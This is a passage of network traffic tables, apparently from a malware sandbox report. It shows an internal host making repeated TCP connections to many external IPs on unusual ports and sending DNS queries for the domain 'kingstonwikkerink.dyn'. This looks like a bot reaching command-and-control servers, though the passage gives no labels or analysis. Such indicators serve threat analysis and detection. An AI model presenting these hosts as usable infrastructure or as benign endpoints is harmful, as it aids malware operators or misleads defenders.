                                                                                          Nov 17, 2024 04:42:03.326018095 CET244941860176.32.39.112192.168.2.23
                                                                                          Nov 17, 2024 04:42:03.326236963 CET418602449192.168.2.23176.32.39.112
                                                                                          Nov 17, 2024 04:42:03.326237917 CET418602449192.168.2.23176.32.39.112
                                                                                          Nov 17, 2024 04:42:03.326288939 CET418602449192.168.2.23176.32.39.112
                                                                                          Nov 17, 2024 04:42:06.921365976 CET4844210788192.168.2.2386.107.100.80
                                                                                          Nov 17, 2024 04:42:06.927356005 CET107884844286.107.100.80192.168.2.23
                                                                                          Nov 17, 2024 04:42:06.927445889 CET4844210788192.168.2.2386.107.100.80
                                                                                          Nov 17, 2024 04:42:06.927522898 CET4844210788192.168.2.2386.107.100.80
                                                                                          Nov 17, 2024 04:42:06.933465958 CET107884844286.107.100.80192.168.2.23
                                                                                          Nov 17, 2024 04:42:06.933532953 CET4844210788192.168.2.2386.107.100.80
                                                                                          Nov 17, 2024 04:42:06.939404964 CET107884844286.107.100.80192.168.2.23
                                                                                          Nov 17, 2024 04:42:08.368665934 CET5502810399192.168.2.2381.29.149.178
                                                                                          Nov 17, 2024 04:42:08.373619080 CET103995502881.29.149.178192.168.2.23
                                                                                          Nov 17, 2024 04:42:08.373709917 CET5502810399192.168.2.2381.29.149.178
                                                                                          Nov 17, 2024 04:42:08.373728991 CET5502810399192.168.2.2381.29.149.178
                                                                                          Nov 17, 2024 04:42:08.378665924 CET103995502881.29.149.178192.168.2.23
                                                                                          Nov 17, 2024 04:42:08.378767014 CET5502810399192.168.2.2381.29.149.178
                                                                                          Nov 17, 2024 04:42:08.383793116 CET103995502881.29.149.178192.168.2.23
                                                                                          Nov 17, 2024 04:42:13.725775003 CET43928443192.168.2.2391.189.91.42
                                                                                          Nov 17, 2024 04:42:15.404244900 CET107884844286.107.100.80192.168.2.23
                                                                                          Nov 17, 2024 04:42:15.405153036 CET4844210788192.168.2.2386.107.100.80
                                                                                          Nov 17, 2024 04:42:15.410422087 CET107884844286.107.100.80192.168.2.23
                                                                                          Nov 17, 2024 04:42:16.862967968 CET103995502881.29.149.178192.168.2.23
                                                                                          Nov 17, 2024 04:42:16.863564968 CET5502810399192.168.2.2381.29.149.178
                                                                                          Nov 17, 2024 04:42:16.868575096 CET103995502881.29.149.178192.168.2.23
                                                                                          Nov 17, 2024 04:42:23.964354992 CET42836443192.168.2.2391.189.91.43
                                                                                          Nov 17, 2024 04:42:30.107511044 CET4251680192.168.2.23109.202.202.202
                                                                                          Nov 17, 2024 04:42:30.543199062 CET403865827192.168.2.2345.147.200.148
                                                                                          Nov 17, 2024 04:42:30.548043013 CET58274038645.147.200.148192.168.2.23
                                                                                          Nov 17, 2024 04:42:30.548156023 CET403865827192.168.2.2345.147.200.148
                                                                                          Nov 17, 2024 04:42:30.548252106 CET403865827192.168.2.2345.147.200.148
                                                                                          Nov 17, 2024 04:42:30.552994013 CET58274038645.147.200.148192.168.2.23
                                                                                          Nov 17, 2024 04:42:30.553051949 CET403865827192.168.2.2345.147.200.148
                                                                                          Nov 17, 2024 04:42:30.557892084 CET58274038645.147.200.148192.168.2.23
                                                                                          Nov 17, 2024 04:42:31.606635094 CET58274038645.147.200.148192.168.2.23
                                                                                          Nov 17, 2024 04:42:31.606812000 CET403865827192.168.2.2345.147.200.148
                                                                                          Nov 17, 2024 04:42:31.606920004 CET403865827192.168.2.2345.147.200.148
                                                                                          Nov 17, 2024 04:42:31.994025946 CET3307613185192.168.2.2389.32.41.42
                                                                                          Nov 17, 2024 04:42:31.998936892 CET131853307689.32.41.42192.168.2.23
                                                                                          Nov 17, 2024 04:42:31.999038935 CET3307613185192.168.2.2389.32.41.42
                                                                                          Nov 17, 2024 04:42:31.999078989 CET3307613185192.168.2.2389.32.41.42
                                                                                          Nov 17, 2024 04:42:32.004332066 CET131853307689.32.41.42192.168.2.23
                                                                                          Nov 17, 2024 04:42:32.004400015 CET3307613185192.168.2.2389.32.41.42
                                                                                          Nov 17, 2024 04:42:32.009296894 CET131853307689.32.41.42192.168.2.23
                                                                                          Nov 17, 2024 04:42:37.053663969 CET4709415929192.168.2.23213.182.204.57
                                                                                          Nov 17, 2024 04:42:37.058629036 CET1592947094213.182.204.57192.168.2.23
                                                                                          Nov 17, 2024 04:42:37.058721066 CET4709415929192.168.2.23213.182.204.57
                                                                                          Nov 17, 2024 04:42:37.058760881 CET4709415929192.168.2.23213.182.204.57
                                                                                          Nov 17, 2024 04:42:37.064208984 CET1592947094213.182.204.57192.168.2.23
                                                                                          Nov 17, 2024 04:42:37.064285040 CET4709415929192.168.2.23213.182.204.57
                                                                                          Nov 17, 2024 04:42:37.069122076 CET1592947094213.182.204.57192.168.2.23
                                                                                          Nov 17, 2024 04:42:40.482094049 CET131853307689.32.41.42192.168.2.23
                                                                                          Nov 17, 2024 04:42:40.482424021 CET3307613185192.168.2.2389.32.41.42
                                                                                          Nov 17, 2024 04:42:40.488408089 CET131853307689.32.41.42192.168.2.23
                                                                                          Nov 17, 2024 04:42:45.541275978 CET1592947094213.182.204.57192.168.2.23
                                                                                          Nov 17, 2024 04:42:45.541662931 CET4709415929192.168.2.23213.182.204.57
                                                                                          Nov 17, 2024 04:42:45.547370911 CET1592947094213.182.204.57192.168.2.23
                                                                                          Nov 17, 2024 04:42:46.225580931 CET5447616520192.168.2.2381.29.149.178
                                                                                          Nov 17, 2024 04:42:46.231951952 CET165205447681.29.149.178192.168.2.23
                                                                                          Nov 17, 2024 04:42:46.232101917 CET5447616520192.168.2.2381.29.149.178
                                                                                          Nov 17, 2024 04:42:46.232140064 CET5447616520192.168.2.2381.29.149.178
                                                                                          Nov 17, 2024 04:42:46.237085104 CET165205447681.29.149.178192.168.2.23
                                                                                          Nov 17, 2024 04:42:46.237215996 CET5447616520192.168.2.2381.29.149.178
                                                                                          Nov 17, 2024 04:42:46.242089987 CET165205447681.29.149.178192.168.2.23
                                                                                          Nov 17, 2024 04:42:50.575122118 CET389323780192.168.2.23194.87.30.79
                                                                                          Nov 17, 2024 04:42:50.580054045 CET378038932194.87.30.79192.168.2.23
                                                                                          Nov 17, 2024 04:42:50.580152988 CET389323780192.168.2.23194.87.30.79
                                                                                          Nov 17, 2024 04:42:50.580198050 CET389323780192.168.2.23194.87.30.79
                                                                                          Nov 17, 2024 04:42:50.585136890 CET378038932194.87.30.79192.168.2.23
                                                                                          Nov 17, 2024 04:42:50.585199118 CET389323780192.168.2.23194.87.30.79
                                                                                          Nov 17, 2024 04:42:50.590738058 CET378038932194.87.30.79192.168.2.23
                                                                                          Nov 17, 2024 04:42:51.542742014 CET378038932194.87.30.79192.168.2.23
                                                                                          Nov 17, 2024 04:42:51.542794943 CET378038932194.87.30.79192.168.2.23
                                                                                          Nov 17, 2024 04:42:51.542983055 CET389323780192.168.2.23194.87.30.79
                                                                                          Nov 17, 2024 04:42:51.542983055 CET389323780192.168.2.23194.87.30.79
                                                                                          Nov 17, 2024 04:42:51.543031931 CET389323780192.168.2.23194.87.30.79
                                                                                          Nov 17, 2024 04:42:51.543205976 CET378038932194.87.30.79192.168.2.23
                                                                                          Nov 17, 2024 04:42:51.543282986 CET389323780192.168.2.23194.87.30.79
                                                                                          Nov 17, 2024 04:42:54.680082083 CET43928443192.168.2.2391.189.91.42
                                                                                          Nov 17, 2024 04:42:54.714359045 CET165205447681.29.149.178192.168.2.23
                                                                                          Nov 17, 2024 04:42:54.714584112 CET5447616520192.168.2.2381.29.149.178
                                                                                          Nov 17, 2024 04:42:54.719355106 CET165205447681.29.149.178192.168.2.23
                                                                                          Nov 17, 2024 04:42:59.746118069 CET4504012125192.168.2.2331.13.248.13
                                                                                          Nov 17, 2024 04:42:59.751903057 CET121254504031.13.248.13192.168.2.23
                                                                                          Nov 17, 2024 04:42:59.751957893 CET4504012125192.168.2.2331.13.248.13
                                                                                          Nov 17, 2024 04:42:59.751992941 CET4504012125192.168.2.2331.13.248.13
                                                                                          Nov 17, 2024 04:42:59.756848097 CET121254504031.13.248.13192.168.2.23
                                                                                          Nov 17, 2024 04:42:59.756910086 CET4504012125192.168.2.2331.13.248.13
                                                                                          Nov 17, 2024 04:42:59.761764050 CET121254504031.13.248.13192.168.2.23
                                                                                          Nov 17, 2024 04:43:00.739532948 CET121254504031.13.248.13192.168.2.23
                                                                                          Nov 17, 2024 04:43:00.739717007 CET4504012125192.168.2.2331.13.248.13
                                                                                          Nov 17, 2024 04:43:00.739761114 CET4504012125192.168.2.2331.13.248.13
                                                                                          Nov 17, 2024 04:43:06.580559969 CET389363780192.168.2.23194.87.30.79
                                                                                          Nov 17, 2024 04:43:06.585599899 CET378038936194.87.30.79192.168.2.23
                                                                                          Nov 17, 2024 04:43:06.585694075 CET389363780192.168.2.23194.87.30.79
                                                                                          Nov 17, 2024 04:43:06.585736990 CET389363780192.168.2.23194.87.30.79
                                                                                          Nov 17, 2024 04:43:06.590729952 CET378038936194.87.30.79192.168.2.23
                                                                                          Nov 17, 2024 04:43:06.590816021 CET389363780192.168.2.23194.87.30.79
                                                                                          Nov 17, 2024 04:43:06.595740080 CET378038936194.87.30.79192.168.2.23
                                                                                          Nov 17, 2024 04:43:07.550632000 CET378038936194.87.30.79192.168.2.23
                                                                                          Nov 17, 2024 04:43:07.550950050 CET389363780192.168.2.23194.87.30.79
                                                                                          Nov 17, 2024 04:43:07.551050901 CET389363780192.168.2.23194.87.30.79
                                                                                          Nov 17, 2024 04:43:15.157394886 CET42836443192.168.2.2391.189.91.43
                                                                                          Nov 17, 2024 04:43:15.771621943 CET4504412125192.168.2.2331.13.248.13
                                                                                          Nov 17, 2024 04:43:15.776612043 CET121254504431.13.248.13192.168.2.23
                                                                                          Nov 17, 2024 04:43:15.776854038 CET4504412125192.168.2.2331.13.248.13
                                                                                          Nov 17, 2024 04:43:15.776942968 CET4504412125192.168.2.2331.13.248.13
                                                                                          Nov 17, 2024 04:43:15.781769991 CET121254504431.13.248.13192.168.2.23
                                                                                          Nov 17, 2024 04:43:15.781971931 CET4504412125192.168.2.2331.13.248.13
                                                                                          Nov 17, 2024 04:43:15.787017107 CET121254504431.13.248.13192.168.2.23
                                                                                          Nov 17, 2024 04:43:16.773931026 CET121254504431.13.248.13192.168.2.23
                                                                                          Nov 17, 2024 04:43:16.773979902 CET121254504431.13.248.13192.168.2.23
                                                                                          Nov 17, 2024 04:43:16.774308920 CET4504412125192.168.2.2331.13.248.13
                                                                                          Nov 17, 2024 04:43:16.774310112 CET4504412125192.168.2.2331.13.248.13
                                                                                          Nov 17, 2024 04:43:16.774310112 CET4504412125192.168.2.2331.13.248.13
                                                                                          Nov 17, 2024 04:43:17.604330063 CET3962813959192.168.2.23103.136.150.114
                                                                                          Nov 17, 2024 04:43:17.609287024 CET1395939628103.136.150.114192.168.2.23
                                                                                          Nov 17, 2024 04:43:17.609412909 CET3962813959192.168.2.23103.136.150.114
                                                                                          Nov 17, 2024 04:43:17.609452963 CET3962813959192.168.2.23103.136.150.114
                                                                                          Nov 17, 2024 04:43:17.614492893 CET1395939628103.136.150.114192.168.2.23
                                                                                          Nov 17, 2024 04:43:17.614567995 CET3962813959192.168.2.23103.136.150.114
                                                                                          Nov 17, 2024 04:43:17.619446993 CET1395939628103.136.150.114192.168.2.23
                                                                                          Nov 17, 2024 04:43:18.953761101 CET1395939628103.136.150.114192.168.2.23
                                                                                          Nov 17, 2024 04:43:18.954159975 CET3962813959192.168.2.23103.136.150.114
                                                                                          Nov 17, 2024 04:43:18.954260111 CET3962813959192.168.2.23103.136.150.114
                                                                                          Nov 17, 2024 04:43:23.987631083 CET3881216709192.168.2.2389.32.41.42
                                                                                          Nov 17, 2024 04:43:23.992681980 CET167093881289.32.41.42192.168.2.23
                                                                                          Nov 17, 2024 04:43:23.992799997 CET3881216709192.168.2.2389.32.41.42
                                                                                          Nov 17, 2024 04:43:23.992835999 CET3881216709192.168.2.2389.32.41.42
                                                                                          Nov 17, 2024 04:43:23.997733116 CET167093881289.32.41.42192.168.2.23
                                                                                          Nov 17, 2024 04:43:23.997811079 CET3881216709192.168.2.2389.32.41.42
                                                                                          Nov 17, 2024 04:43:24.003011942 CET167093881289.32.41.42192.168.2.23
                                                                                          Nov 17, 2024 04:43:26.822396040 CET529481890192.168.2.2331.13.248.13
                                                                                          Nov 17, 2024 04:43:26.827450037 CET18905294831.13.248.13192.168.2.23
                                                                                          Nov 17, 2024 04:43:26.827533960 CET529481890192.168.2.2331.13.248.13
                                                                                          Nov 17, 2024 04:43:26.827601910 CET529481890192.168.2.2331.13.248.13
                                                                                          Nov 17, 2024 04:43:26.832550049 CET18905294831.13.248.13192.168.2.23
                                                                                          Nov 17, 2024 04:43:26.832637072 CET529481890192.168.2.2331.13.248.13
                                                                                          Nov 17, 2024 04:43:26.837584019 CET18905294831.13.248.13192.168.2.23
                                                                                          Nov 17, 2024 04:43:27.827838898 CET18905294831.13.248.13192.168.2.23
                                                                                          Nov 17, 2024 04:43:27.828197956 CET529481890192.168.2.2331.13.248.13
                                                                                          Nov 17, 2024 04:43:27.828197956 CET529481890192.168.2.2331.13.248.13
                                                                                          Nov 17, 2024 04:43:27.830210924 CET18905294831.13.248.13192.168.2.23
                                                                                          Nov 17, 2024 04:43:27.830307007 CET529481890192.168.2.2331.13.248.13
                                                                                          Nov 17, 2024 04:43:32.479794025 CET167093881289.32.41.42192.168.2.23
                                                                                          Nov 17, 2024 04:43:32.480494022 CET3881216709192.168.2.2389.32.41.42
                                                                                          Nov 17, 2024 04:43:32.485863924 CET167093881289.32.41.42192.168.2.23
                                                                                          Nov 17, 2024 04:43:32.859484911 CET3297216546192.168.2.2389.32.41.42
                                                                                          Nov 17, 2024 04:43:32.864495993 CET165463297289.32.41.42192.168.2.23
                                                                                          Nov 17, 2024 04:43:32.864568949 CET3297216546192.168.2.2389.32.41.42
                                                                                          Nov 17, 2024 04:43:32.864568949 CET3297216546192.168.2.2389.32.41.42
                                                                                          Nov 17, 2024 04:43:32.869530916 CET165463297289.32.41.42192.168.2.23
                                                                                          Nov 17, 2024 04:43:32.869657993 CET3297216546192.168.2.2389.32.41.42
                                                                                          Nov 17, 2024 04:43:32.874556065 CET165463297289.32.41.42192.168.2.23
                                                                                          Nov 17, 2024 04:43:37.512689114 CET3616212835192.168.2.23193.233.193.45
                                                                                          Nov 17, 2024 04:43:37.517709017 CET1283536162193.233.193.45192.168.2.23
                                                                                          Nov 17, 2024 04:43:37.517781973 CET3616212835192.168.2.23193.233.193.45
                                                                                          Nov 17, 2024 04:43:37.517823935 CET3616212835192.168.2.23193.233.193.45
                                                                                          Nov 17, 2024 04:43:37.522705078 CET1283536162193.233.193.45192.168.2.23
                                                                                          Nov 17, 2024 04:43:37.522788048 CET3616212835192.168.2.23193.233.193.45
                                                                                          Nov 17, 2024 04:43:37.527699947 CET1283536162193.233.193.45192.168.2.23
                                                                                          Nov 17, 2024 04:43:41.339675903 CET165463297289.32.41.42192.168.2.23
                                                                                          Nov 17, 2024 04:43:41.340356112 CET3297216546192.168.2.2389.32.41.42
                                                                                          Nov 17, 2024 04:43:41.345326900 CET165463297289.32.41.42192.168.2.23
                                                                                          Nov 17, 2024 04:43:45.992517948 CET1283536162193.233.193.45192.168.2.23
                                                                                          Nov 17, 2024 04:43:45.993093014 CET3616212835192.168.2.23193.233.193.45
                                                                                          Nov 17, 2024 04:43:45.998085976 CET1283536162193.233.193.45192.168.2.23
                                                                                          Nov 17, 2024 04:43:46.371005058 CET546882344192.168.2.2391.149.218.232
                                                                                          Nov 17, 2024 04:43:46.376545906 CET23445468891.149.218.232192.168.2.23
                                                                                          Nov 17, 2024 04:43:46.376780033 CET546882344192.168.2.2391.149.218.232
                                                                                          Nov 17, 2024 04:43:46.376780033 CET546882344192.168.2.2391.149.218.232
                                                                                          Nov 17, 2024 04:43:46.382153988 CET23445468891.149.218.232192.168.2.23
                                                                                          Nov 17, 2024 04:43:46.382394075 CET546882344192.168.2.2391.149.218.232
                                                                                          Nov 17, 2024 04:43:46.387731075 CET23445468891.149.218.232192.168.2.23
                                                                                          Nov 17, 2024 04:43:46.965328932 CET23445468891.149.218.232192.168.2.23
                                                                                          Nov 17, 2024 04:43:46.965887070 CET546882344192.168.2.2391.149.218.232
                                                                                          Nov 17, 2024 04:43:46.971123934 CET23445468891.149.218.232192.168.2.23
                                                                                          Nov 17, 2024 04:43:51.090327978 CET4924010932192.168.2.2345.147.200.148
                                                                                          Nov 17, 2024 04:43:51.095746994 CET109324924045.147.200.148192.168.2.23
                                                                                          Nov 17, 2024 04:43:51.095860958 CET4924010932192.168.2.2345.147.200.148
                                                                                          Nov 17, 2024 04:43:51.096096992 CET4924010932192.168.2.2345.147.200.148
                                                                                          Nov 17, 2024 04:43:51.101279020 CET109324924045.147.200.148192.168.2.23
                                                                                          Nov 17, 2024 04:43:51.101520061 CET4924010932192.168.2.2345.147.200.148
                                                                                          Nov 17, 2024 04:43:51.106873035 CET109324924045.147.200.148192.168.2.23
                                                                                          Nov 17, 2024 04:43:52.069905996 CET422226429192.168.2.23103.136.150.114
                                                                                          Nov 17, 2024 04:43:52.075674057 CET642942222103.136.150.114192.168.2.23
                                                                                          Nov 17, 2024 04:43:52.076072931 CET422226429192.168.2.23103.136.150.114
                                                                                          Nov 17, 2024 04:43:52.076286077 CET422226429192.168.2.23103.136.150.114
                                                                                          Nov 17, 2024 04:43:52.081626892 CET642942222103.136.150.114192.168.2.23
                                                                                          Nov 17, 2024 04:43:52.082073927 CET422226429192.168.2.23103.136.150.114
                                                                                          Nov 17, 2024 04:43:52.087738991 CET642942222103.136.150.114192.168.2.23
                                                                                          Nov 17, 2024 04:43:52.183351040 CET109324924045.147.200.148192.168.2.23
                                                                                          Nov 17, 2024 04:43:52.183830976 CET4924010932192.168.2.2345.147.200.148
                                                                                          Nov 17, 2024 04:43:52.184191942 CET4924010932192.168.2.2345.147.200.148
                                                                                          Nov 17, 2024 04:43:53.432600021 CET642942222103.136.150.114192.168.2.23
                                                                                          Nov 17, 2024 04:43:53.433150053 CET422226429192.168.2.23103.136.150.114
                                                                                          Nov 17, 2024 04:43:53.433151007 CET422226429192.168.2.23103.136.150.114
                                                                                          Nov 17, 2024 04:43:57.241923094 CET428567266192.168.2.23209.141.57.98
                                                                                          Nov 17, 2024 04:43:57.246879101 CET726642856209.141.57.98192.168.2.23
                                                                                          Nov 17, 2024 04:43:57.246969938 CET428567266192.168.2.23209.141.57.98
                                                                                          Nov 17, 2024 04:43:57.247018099 CET428567266192.168.2.23209.141.57.98
                                                                                          Nov 17, 2024 04:43:57.251857996 CET726642856209.141.57.98192.168.2.23
                                                                                          Nov 17, 2024 04:43:57.251936913 CET428567266192.168.2.23209.141.57.98
                                                                                          Nov 17, 2024 04:43:57.256814957 CET726642856209.141.57.98192.168.2.23
                                                                                          Nov 17, 2024 04:43:58.230319977 CET726642856209.141.57.98192.168.2.23
                                                                                          Nov 17, 2024 04:43:58.230870962 CET428567266192.168.2.23209.141.57.98
                                                                                          Nov 17, 2024 04:43:58.230967999 CET428567266192.168.2.23209.141.57.98
                                                                                          Nov 17, 2024 04:43:58.491426945 CET450749462192.168.2.23193.233.193.45
                                                                                          Nov 17, 2024 04:43:58.496464014 CET946245074193.233.193.45192.168.2.23
                                                                                          Nov 17, 2024 04:43:58.496965885 CET450749462192.168.2.23193.233.193.45
                                                                                          Nov 17, 2024 04:43:58.496965885 CET450749462192.168.2.23193.233.193.45
                                                                                          Nov 17, 2024 04:43:58.501982927 CET946245074193.233.193.45192.168.2.23
                                                                                          Nov 17, 2024 04:43:58.502482891 CET450749462192.168.2.23193.233.193.45
                                                                                          Nov 17, 2024 04:43:58.507432938 CET946245074193.233.193.45192.168.2.23
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Nov 17, 2024 04:41:54.509120941 CET5880353192.168.2.2380.152.203.134
                                                                                          Nov 17, 2024 04:41:54.658365965 CET5874253192.168.2.2380.152.203.134
                                                                                          Nov 17, 2024 04:41:54.916501045 CET535880380.152.203.134192.168.2.23
                                                                                          Nov 17, 2024 04:41:55.033659935 CET535874280.152.203.134192.168.2.23
                                                                                          Nov 17, 2024 04:42:00.874370098 CET4366253192.168.2.23152.53.15.127
                                                                                          Nov 17, 2024 04:42:00.885332108 CET5343662152.53.15.127192.168.2.23
                                                                                          Nov 17, 2024 04:42:00.886905909 CET4329353192.168.2.23185.181.61.24
                                                                                          Nov 17, 2024 04:42:00.920175076 CET5343293185.181.61.24192.168.2.23
                                                                                          Nov 17, 2024 04:42:02.245269060 CET4328753192.168.2.23152.53.15.127
                                                                                          Nov 17, 2024 04:42:02.255855083 CET5343287152.53.15.127192.168.2.23
                                                                                          Nov 17, 2024 04:42:02.257410049 CET6029953192.168.2.23185.181.61.24
                                                                                          Nov 17, 2024 04:42:02.290584087 CET5360299185.181.61.24192.168.2.23
                                                                                          Nov 17, 2024 04:42:06.880428076 CET5468053192.168.2.23194.36.144.87
                                                                                          Nov 17, 2024 04:42:06.890882969 CET5354680194.36.144.87192.168.2.23
                                                                                          Nov 17, 2024 04:42:06.892664909 CET4559553192.168.2.2381.169.136.222
                                                                                          Nov 17, 2024 04:42:06.920180082 CET534559581.169.136.222192.168.2.23
                                                                                          Nov 17, 2024 04:42:08.328100920 CET4151053192.168.2.23194.36.144.87
                                                                                          Nov 17, 2024 04:42:08.338671923 CET5341510194.36.144.87192.168.2.23
                                                                                          Nov 17, 2024 04:42:08.339724064 CET3550653192.168.2.2381.169.136.222
                                                                                          Nov 17, 2024 04:42:08.367834091 CET533550681.169.136.222192.168.2.23
                                                                                          Nov 17, 2024 04:42:20.408404112 CET4463353192.168.2.23139.84.165.176
                                                                                          Nov 17, 2024 04:42:21.866657019 CET4974353192.168.2.23139.84.165.176
                                                                                          Nov 17, 2024 04:42:25.415851116 CET5314553192.168.2.2370.34.254.19
                                                                                          Nov 17, 2024 04:42:26.869582891 CET3966653192.168.2.2370.34.254.19
                                                                                          Nov 17, 2024 04:42:30.422538042 CET5571753192.168.2.2365.21.1.106
                                                                                          Nov 17, 2024 04:42:30.449263096 CET535571765.21.1.106192.168.2.23
                                                                                          Nov 17, 2024 04:42:30.451415062 CET5840253192.168.2.23168.235.111.72
                                                                                          Nov 17, 2024 04:42:30.541625977 CET5358402168.235.111.72192.168.2.23
                                                                                          Nov 17, 2024 04:42:31.875534058 CET4259553192.168.2.2365.21.1.106
                                                                                          Nov 17, 2024 04:42:31.901845932 CET534259565.21.1.106192.168.2.23
                                                                                          Nov 17, 2024 04:42:31.903132915 CET5665353192.168.2.23168.235.111.72
                                                                                          Nov 17, 2024 04:42:31.992782116 CET5356653168.235.111.72192.168.2.23
                                                                                          Nov 17, 2024 04:42:36.609117985 CET5500053192.168.2.2380.152.203.134
                                                                                          Nov 17, 2024 04:42:37.052114010 CET535500080.152.203.134192.168.2.23
                                                                                          Nov 17, 2024 04:42:45.485991955 CET4054853192.168.2.2380.152.203.134
                                                                                          Nov 17, 2024 04:42:46.224534988 CET534054880.152.203.134192.168.2.23
                                                                                          Nov 17, 2024 04:42:50.546200037 CET5841053192.168.2.23217.160.70.42
                                                                                          Nov 17, 2024 04:42:50.573673010 CET5358410217.160.70.42192.168.2.23
                                                                                          Nov 17, 2024 04:42:56.545763969 CET4465253192.168.2.23139.84.165.176
                                                                                          Nov 17, 2024 04:42:59.717015982 CET6068253192.168.2.23217.160.70.42
                                                                                          Nov 17, 2024 04:42:59.744982958 CET5360682217.160.70.42192.168.2.23
                                                                                          Nov 17, 2024 04:43:01.551654100 CET4042353192.168.2.23194.36.144.87
                                                                                          Nov 17, 2024 04:43:01.562237978 CET5340423194.36.144.87192.168.2.23
                                                                                          Nov 17, 2024 04:43:01.563513041 CET4056953192.168.2.2370.34.254.19
                                                                                          Nov 17, 2024 04:43:05.741280079 CET5687853192.168.2.23139.84.165.176
                                                                                          Nov 17, 2024 04:43:06.569294930 CET4071253192.168.2.23152.53.15.127
                                                                                          Nov 17, 2024 04:43:06.579782009 CET5340712152.53.15.127192.168.2.23
                                                                                          Nov 17, 2024 04:43:10.743099928 CET4855553192.168.2.23194.36.144.87
                                                                                          Nov 17, 2024 04:43:10.753588915 CET5348555194.36.144.87192.168.2.23
                                                                                          Nov 17, 2024 04:43:10.754698992 CET5276353192.168.2.2370.34.254.19
                                                                                          Nov 17, 2024 04:43:12.556917906 CET4685753192.168.2.235.161.109.23
                                                                                          Nov 17, 2024 04:43:15.760142088 CET5804853192.168.2.23152.53.15.127
                                                                                          Nov 17, 2024 04:43:15.770867109 CET5358048152.53.15.127192.168.2.23
                                                                                          Nov 17, 2024 04:43:17.563357115 CET5611553192.168.2.2365.21.1.106
                                                                                          Nov 17, 2024 04:43:17.590336084 CET535611565.21.1.106192.168.2.23
                                                                                          Nov 17, 2024 04:43:17.592334032 CET5720053192.168.2.23202.61.197.122
                                                                                          Nov 17, 2024 04:43:17.603362083 CET5357200202.61.197.122192.168.2.23
                                                                                          Nov 17, 2024 04:43:21.777815104 CET5905053192.168.2.235.161.109.23
                                                                                          Nov 17, 2024 04:43:23.958432913 CET5674453192.168.2.23217.160.70.42
                                                                                          Nov 17, 2024 04:43:23.986334085 CET5356744217.160.70.42192.168.2.23
                                                                                          Nov 17, 2024 04:43:26.781958103 CET3765753192.168.2.2365.21.1.106
                                                                                          Nov 17, 2024 04:43:26.808984041 CET533765765.21.1.106192.168.2.23
                                                                                          Nov 17, 2024 04:43:26.810915947 CET3547753192.168.2.23202.61.197.122
                                                                                          Nov 17, 2024 04:43:26.821477890 CET5335477202.61.197.122192.168.2.23
                                                                                          Nov 17, 2024 04:43:32.831202030 CET3851453192.168.2.23217.160.70.42
                                                                                          Nov 17, 2024 04:43:32.858580112 CET5338514217.160.70.42192.168.2.23
                                                                                          Nov 17, 2024 04:43:37.487236977 CET4397253192.168.2.23152.53.15.127
                                                                                          Nov 17, 2024 04:43:37.497934103 CET5343972152.53.15.127192.168.2.23
                                                                                          Nov 17, 2024 04:43:37.500428915 CET3607353192.168.2.23202.61.197.122
                                                                                          Nov 17, 2024 04:43:37.511006117 CET5336073202.61.197.122192.168.2.23
                                                                                          Nov 17, 2024 04:43:46.345294952 CET6073553192.168.2.23152.53.15.127
                                                                                          Nov 17, 2024 04:43:46.356339931 CET5360735152.53.15.127192.168.2.23
                                                                                          Nov 17, 2024 04:43:46.358374119 CET5255453192.168.2.23202.61.197.122
                                                                                          Nov 17, 2024 04:43:46.369571924 CET5352554202.61.197.122192.168.2.23
                                                                                          Nov 17, 2024 04:43:51.000273943 CET3711153192.168.2.23168.235.111.72
                                                                                          Nov 17, 2024 04:43:51.088376045 CET5337111168.235.111.72192.168.2.23
                                                                                          Nov 17, 2024 04:43:51.971251011 CET4371353192.168.2.23168.235.111.72
                                                                                          Nov 17, 2024 04:43:52.067214966 CET5343713168.235.111.72192.168.2.23
                                                                                          Nov 17, 2024 04:43:57.189724922 CET4591453192.168.2.2365.21.1.106
                                                                                          Nov 17, 2024 04:43:57.216428995 CET534591465.21.1.106192.168.2.23
                                                                                          Nov 17, 2024 04:43:57.218456030 CET4620853192.168.2.23194.36.144.87
                                                                                          Nov 17, 2024 04:43:57.228794098 CET5346208194.36.144.87192.168.2.23
                                                                                          Nov 17, 2024 04:43:57.230621099 CET3292453192.168.2.23202.61.197.122
                                                                                          Nov 17, 2024 04:43:57.241039038 CET5332924202.61.197.122192.168.2.23
                                                                                          Nov 17, 2024 04:43:58.438764095 CET5717353192.168.2.2365.21.1.106
                                                                                          Nov 17, 2024 04:43:58.465249062 CET535717365.21.1.106192.168.2.23
                                                                                          Nov 17, 2024 04:43:58.467087030 CET4127553192.168.2.23194.36.144.87
                                                                                          Nov 17, 2024 04:43:58.477365971 CET5341275194.36.144.87192.168.2.23
                                                                                          Nov 17, 2024 04:43:58.479561090 CET3575753192.168.2.23202.61.197.122
                                                                                          Nov 17, 2024 04:43:58.489933968 CET5335757202.61.197.122192.168.2.23
                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Nov 17, 2024 04:41:54.509120941 CET192.168.2.2380.152.203.1340xbedbStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:41:54.658365965 CET192.168.2.2380.152.203.1340xbedbStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:42:00.874370098 CET192.168.2.23152.53.15.1270xb47cStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:42:00.886905909 CET192.168.2.23185.181.61.240xcd4bStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:42:02.245269060 CET192.168.2.23152.53.15.1270xb47cStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:42:02.257410049 CET192.168.2.23185.181.61.240xcd4bStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:42:06.880428076 CET192.168.2.23194.36.144.870x699Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:42:06.892664909 CET192.168.2.2381.169.136.2220x7d62Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:42:08.328100920 CET192.168.2.23194.36.144.870x699Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:42:08.339724064 CET192.168.2.2381.169.136.2220x7d62Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
